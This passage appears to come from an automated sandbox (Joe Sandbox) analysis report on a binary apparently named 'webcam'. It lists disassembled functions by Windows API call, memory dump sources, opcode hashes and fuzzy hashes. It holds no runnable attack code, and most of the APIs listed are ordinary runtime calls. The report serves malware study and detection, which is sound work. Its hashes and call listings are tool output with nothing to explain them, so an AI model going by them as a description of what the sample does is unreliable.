                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                                                                            • Opcode ID: dbe72d997eb6c2d243ff8bee3b885996821ff43da3632a9baa193eefa62b0ff7
                                                                                                                                                                                                            • Instruction ID: 9c4c2552e0aa43cc01603a3fb1c28c40c25f81270c9d146e11811b071c8cdedc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbe72d997eb6c2d243ff8bee3b885996821ff43da3632a9baa193eefa62b0ff7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0ED0C9E026550296EA015F315E0921B3AAC6F507627958ABAA826F12E1EB38CA14A519
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00000000,004037CE,?,00401EE8,00000000), ref: 00403D45
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                            • Opcode ID: 22c731757b1142beab6176de30feae75187bec65ecd1c046d2d7fbcad0bf9ae9
                                                                                                                                                                                                            • Instruction ID: 81e7dd66bc3a636d26e819c498fd3557b4744c3378aa58c4f367938c739c9a74
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22c731757b1142beab6176de30feae75187bec65ecd1c046d2d7fbcad0bf9ae9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40D05E3264A6206AD5112A18BC02FEB2B5C9F91B21F15446FF4007A1E5CB3C9C8109DC
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00403CAF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: 27d190d87eb390a2e4b2e32f777bb7342ca319cf0b8b1bda9bdf53b3c12d4fd0
                                                                                                                                                                                                            • Instruction ID: 30c31515092504ca0bfbc9572f52f6af0897c4269d2eaf9da3154517631336a6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27d190d87eb390a2e4b2e32f777bb7342ca319cf0b8b1bda9bdf53b3c12d4fd0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CE0C23381953096EA212B18BE057CB3A18AF01B65F060237FC44BB2E1C7386D4045DC
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(?,00008000,00001000,?,00000013,00000000,000000E0,?,?,00404EAB,000000E0,00000013,?,74D656E0,0040143F,?), ref: 004051D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                            • Opcode ID: 35503fca1021ab05d7b52264e6852854c2d22391e621d232ca43d378a29343d6
                                                                                                                                                                                                            • Instruction ID: 0271b84711de76720c0d7ff4873a7005d34d77c44ce78967c8b955fafef921a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35503fca1021ab05d7b52264e6852854c2d22391e621d232ca43d378a29343d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60317A316006069FD314CF18C884BA6BBE4FF54368F29C2BED1598B2E1D7749946CB44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.USER32(user32.dll,?,00000000,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 004057FD
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,MessageBoxA,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405815
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,GetActiveWindow,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405826
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,GetLastActivePopup,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405833
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                                                                            • API String ID: 2238633743-4044615076
                                                                                                                                                                                                            • Opcode ID: 4083e126882c5ced38b2982ecdd0aa8fb8f6d206dbe6733fa578fa79caa5add0
                                                                                                                                                                                                            • Instruction ID: b69252d3eda3f5ce78422e4d92470a3ce5f88092df5f94a3546d82688f01e71e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4083e126882c5ced38b2982ecdd0aa8fb8f6d206dbe6733fa578fa79caa5add0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28017572740705DFC710AFB59C84A573EE9DB58740316843FA605F22A0DA78C825DF78
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(0000002E,0000002E,?,00000000,0000001E), ref: 004019F2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: SystemTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2656138-0
                                                                                                                                                                                                            • Opcode ID: 058c2d7feba0809f327c2ad5695b26e8b15d94b3b1189f33cf0f95695adc544f
                                                                                                                                                                                                            • Instruction ID: 5509a1f7b8fd045947e4fd0e8f7848a75be2432affde2ac2507702c38ffbf4b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 058c2d7feba0809f327c2ad5695b26e8b15d94b3b1189f33cf0f95695adc544f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4010C24E21219A6CF14EB94C5585EDB3B4FF44348F40999AE412B73A0E3F99685CB89
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e41a8d1ff456f707db322ebb239d32054a16201fa2e3cf21b69386307f83a213
                                                                                                                                                                                                            • Instruction ID: fdc676fa3bbf09f973ca31bbc1720d313cd6944ddd87bf46bbd657e027e79546
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e41a8d1ff456f707db322ebb239d32054a16201fa2e3cf21b69386307f83a213
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA319233E285B207C324CEBA5C80066F7D1AB8E22674B87B9DD95FB251D139FD1186E4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: htons
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4207154920-0
                                                                                                                                                                                                            • Opcode ID: 3b681f48e5d0c725af44bdea3f5e9e1581bd8ae6c8751c1361cb48875ca40376
                                                                                                                                                                                                            • Instruction ID: 9b5c7b10500d90536ef99daddf581d525364c1f5c7a8bc25fbad06f6334030b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b681f48e5d0c725af44bdea3f5e9e1581bd8ae6c8751c1361cb48875ca40376
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6661C47A804209ABCB14DFA4C8457EEBBB4FF04314F50446BE406B76A1D77CDA85CB98
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004068D0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405BF7
                                                                                                                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,00417EE0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C13
                                                                                                                                                                                                            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C5C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405C94
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405CEC
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D02
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D35
                                                                                                                                                                                                            • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405D9D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 352835431-0
                                                                                                                                                                                                            • Opcode ID: 8bb2a11c8592da06ff3adaae57ca199b6941de967179a06f560761e18254fef3
                                                                                                                                                                                                            • Instruction ID: 81b75aa7be9e3bfa6048845914e0abc472b891a7c2b0f3d519397b4cd530eeb0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb2a11c8592da06ff3adaae57ca199b6941de967179a06f560761e18254fef3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28517C31900609ABCF218F54DC49AEF7FB9FF49750F24812AF915B61A0D33989A0DF69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 004043C1
                                                                                                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 004043D5
                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 00404401
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403B88), ref: 00404439
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403B88), ref: 0040445B
                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403B88), ref: 00404474
                                                                                                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403B88), ref: 00404487
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$Free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3512638745-0
                                                                                                                                                                                                            • Opcode ID: d26d06ecd7c4ffc8134835e528f208422d0f1f2bc766106d958cbaa5f9df33d0
                                                                                                                                                                                                            • Instruction ID: 5d972f26fcbcd176568d0505b3b115d55bd9c5a9d6aab9954fda4a9a130f43d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d26d06ecd7c4ffc8134835e528f208422d0f1f2bc766106d958cbaa5f9df33d0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7231F2F25042656FD7207FB49C84A3B7A8CE6C5358716063FFB42F3281EA398C558269
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,00406844,00000000,?,00000000,00000000), ref: 00404A0C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000), ref: 00404A13
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandleWrite
                                                                                                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                            • API String ID: 3320372497-4022980321
                                                                                                                                                                                                            • Opcode ID: 74794024bdef46d4f1375075b0d2a88467e563281dfd164a22fa197795969e9e
                                                                                                                                                                                                            • Instruction ID: 9d75f8f840a33461f7636776d7fd5feb9408c1945f2d6d3db45423b93c088b80
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74794024bdef46d4f1375075b0d2a88467e563281dfd164a22fa197795969e9e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 413124F2A00218AEDB20EA61CC41F9B37ACEB84704F14447BF645F22C1E678DA408A6D
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,004068D0,00000001,00000001,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000,?,?,74DEE070), ref: 004052BF
                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00417EE0,00000001,?,?,00403894,004029CE,?,004029CE,00000000,?,?,74DEE070,00417EE0), ref: 004052D9
                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000001,004029CE,?,004029CE,00403894,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000), ref: 0040530D
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,004029CE,00000000,00000000,0000005D,00000000,00000001,?,00403894,004029CE,?,004029CE,00000000), ref: 00405345
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,004029CE,?,?,?,?,?,?,00403894,004029CE,?,004029CE), ref: 0040539B
                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(004029CE,?,00000000,00403894,?,?,?,?,?,?,00403894,004029CE,?,004029CE), ref: 004053AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3852931651-0
                                                                                                                                                                                                            • Opcode ID: 40b95dea3268905a436086882555c30f24bb0e1df8b30e35344bdaa847683b9a
                                                                                                                                                                                                            • Instruction ID: 690bf82c612f5ff1554cbd000954cf9474f10d0111165a3a49fad0687cfb2505
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40b95dea3268905a436086882555c30f24bb0e1df8b30e35344bdaa847683b9a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23418072601619AFDF109F94CC85AEF3F79FB09790F11443AFA02E2290D37989548FA8
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 0040565E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
